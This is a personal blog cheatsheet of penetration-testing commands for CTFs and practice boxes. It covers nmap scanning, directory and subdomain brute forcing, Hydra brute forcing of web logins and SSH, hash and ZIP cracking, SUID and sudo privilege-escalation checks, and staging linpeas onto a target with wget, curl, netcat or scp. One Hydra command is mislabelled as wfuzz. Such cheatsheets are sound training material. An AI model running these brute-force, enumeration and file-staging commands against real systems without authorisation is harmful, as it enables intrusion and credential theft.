Thumbnail: gravatar

The Essentials - My Favorite Tools and Commands

by on under cheatsheets
4 minute read

This cheatsheet contains essential commands I always use in CTFs, THM boxes, and in cybersecurity. Includes commands and tools for discovery to transferring files, passing by web tools, and cracking. I encourage the other content creators to replicate this kind of cheatsheet on their platform (a mention will always be appreciated 😊).


Discovery

Nmap

Basic nmap scan:

nmap -vv -sC -sV -oN nmap.log $IP

Complete nmap scan:

nmap -vv -A -p- -oN nmap-complete.log $IP

See my nmap cheatsheet for other personal favorites.

Web Directory and Query Parameters Bruteforce

Using gobuster:

gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -o gobuster.log -t 200 -u $URL

Using wfuzz:

wfuzz -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 200 --hc 404 http://www.host.name/FUZZ

Using wfuzz to bruteforce query parameters:

wfuzz -c -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 200 --hc 404 http://www.host.name/?parameter=FUZZ

Recursive directory scan with wfuzz:

wfuzz -c -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -t 200 --hc 404 -R $DEPTH http://www.host.name/FUZZ

Web

HTTP Form Bruteforce

Using Hydra:

hydra -l user -P /usr/share/wordlists/rockyou.txt $IP http-post-form "<Login Page>:<Request Body>:<Error Message>"

Using wfuzz:

hydra -l user -P /usr/share/wordlists/rockyou.txt $IP http-post-form "<Login Page>:<Request Body>:<Error Message>"

Wordpress

WPScan + password bruteforce:

wpscan --url $URL --passwords /usr/share/wordlists/rockyou.txt --usernames usernames.txt

Subdomain Bruteforce

Using wfuzz:

wfuzz -c -f wfuzz-sub.log -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u $URL -H "Host: FUZZ.host.name" -t 32 --hc 200 --hw 356

Note: you will need to adjust the --hc and --hw parameters to your needs. Check wfuzz -h for more information about those.

Using gobuster:

gobuster vhost -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u $URL -t 32

Cracking

ZIP

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt file.zip

Hashes

Using hashcat:

hashcat -m $MODE hashes /usr/share/wordlists/rockyou.txt

Bruteforce SSH

Using hydra:

hydra -f -l user -P /usr/share/wordlists/rockyou.txt $IP -t 4 ssh

Steganography

Crack steghide passphrase using stegracker: Install:

pip3 install stegcracker

Run:

python3 -m stegcracker tocrack.jpg

Privescs Discovery

Find privescs exploiting SUID binaries:

find / -perm -u=s -type f 2>/dev/null

Find privescs by listing sudo permissions:

sudo -l

Enumerate interesting files, processes, and privescs using Linpeas:

  1. Install linpeas on your machine.
  2. Transfer it to the target machine. (see the Transferring Files)
  3. Make it executable, run it, and tee the output to a log file for further analysis.
chmod +x linpeas.sh
./linpeas.sh | tee linpeas.log

Transferring Files

Open an HTTP server:

  1. cd into the directory you want to access one or more files from.
  2. Open an HTTP server:
# PYTHON3
python3 -m http.server -b $IP $PORT

# PHP
php -S $IP:$PORT
  1. Access the file:
# Wget
wget http://$IP:$PORT/file

# Curl
curl http://$IP:$PORT/file -o target_file

# Netcat
nc $IP $PORT > target_file

Using SCP:

# Send
scp /path/to/file [email protected]$HOST:/path/

# Send with custom name
scp /path/to/file [email protected]$HOST:/path/different_name

# Get
scp [email protected]$HOST:/path/to/file /local/directory

Note: To connect with an SSH key, you may need to use the -i flag followed by the path to the key.

Using netcat:

# Server
nc -lp $PORT < file

# Client
nc $IP $PORT > file
comments powered by Disqus